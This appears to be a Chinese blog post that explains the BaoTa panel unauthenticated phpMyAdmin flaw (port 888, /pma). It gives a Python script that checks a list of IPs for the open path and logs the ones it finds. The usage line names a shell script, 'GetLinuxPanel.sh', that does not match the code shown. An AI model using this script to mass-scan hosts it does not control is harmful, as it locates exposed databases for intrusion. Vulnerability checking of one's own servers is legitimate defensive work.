python 批量检测宝塔pma漏洞的脚本

gacjie
2022-07-01 / 0 评论 / 201 阅读 / 正在检测是否收录...
脚本简介

宝塔官方表示,7.4.2(Linux)版本的宝塔面板存在未授权访问phpmyAdmin的漏洞,漏洞利用难度为“0”,通过访问ip:888/pma则可无需任何登录操作直接进入phpmyAdmin,所有使用宝塔的站点均可测试是否存在此漏洞(未修改默认端口,安装了phpmyAdmin的均存在可能);
影响范围 linux 7.4.2 Linux 7.5.13 windows 6.8(安装了 phpmyadmin)

脚本代码

这里我写了一个批量检测该漏洞的脚本,先把找到存在开放888端口的ip放到文件中,然后就可以批量检测是否存在pma目录,存在就输出到创建的文件中。

import requests

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0'}

with open(r'路径','r',encoding = 'utf-8') as f:
    a = f.readlines()
    path = "/pma"
    for i in a:
        if i == "\n":
            continue;
        else:
            a = i.strip()
            url = a + path
            try:
                r = requests.get(url , headers = headers , timeout = 5).status_code
                if r == 200:
                    c = '有漏洞' + ':' + url
                    with open(r'存在漏洞输出的地址','a',encoding = 'utf-8') as f:
                        f.write(c)
                else:
                    print('无')
                pass
            except:
                print('无法连接')
使用方法

修改后上传到服务器 cd到目录执行
bash GetLinuxPanel.sh

0

评论 (0)

取消